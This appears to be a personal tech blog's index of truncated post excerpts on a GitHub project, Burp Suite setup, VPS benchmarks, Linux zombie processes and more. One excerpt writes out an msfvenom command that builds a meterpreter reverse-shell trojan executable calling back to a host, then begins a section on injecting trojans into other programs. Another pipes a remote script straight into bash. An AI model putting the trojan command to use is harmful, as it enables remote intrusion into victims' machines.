If you follow my Github account (well, I bet you don't, but feel free to mutually follow), you might have noticed that I've been submitting PRs and releasing like crazy for a certain project recently. Here it is (by the way, would you mind giving it a star?). https://gi...
Original Image e519516d5b0f8b9d96c9540c5809d565 Line-by-line Analysis 1. The test engineer ordered a beer Pretty normal, hmm. 2. The test engineer ordered a coffee Does your pub sell c...
Disclaimer Environment: macOS 26.3 M1 Burp Suite Pro 2025.2.4 Download the main program Go to the PortSwigger portal to download the main program. . Guess what? There were indeed comment spammers, but unfortunately... this waste of space didn't succeed. All spam c...
We are all bugs in the gutter, but someone must still look up at the stars. In China, any idea that takes flight will eventually crash to the ground. The gravity of reality is too heavy. Your lack of fear comes from your ignorance. —— From Yang Dong's (Ye Wenjie's daughter) suicide note ...
Basic Information | Item | Content | | ----------------- | --------------------------------------- | | CPU Model | Intel Xeon Platinum 8255C CPU @ 2.50GHz | | CPU Cores | 2 Cores | | CPU Frequency | 2494.144 MHz | | CPU Cache | L1: 64.00 KB, L2: 8.00 MB, L3: 35.75 MB | | **AES-NI...
Native Trojan msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1234 -f exe -o a.exe Trojan without any disguise Trojan Injected into Other Applications `bas...
Logged into the console today and found the following output There are 20 zombie processes Console Output To be honest, I'm not very familiar with Linux. Seeing zombie my first reaction was a Trojan (my new server has only been in...
Preface This test is based on the following GitHub open-source script: https://github.com/everett7623/vps_scripts You can choose to run the following command directly: bash <(curl -s https://raw.githubusercontent.com/everett7623/vps_scripts/main/vps.sh) Test Results I. Basic S...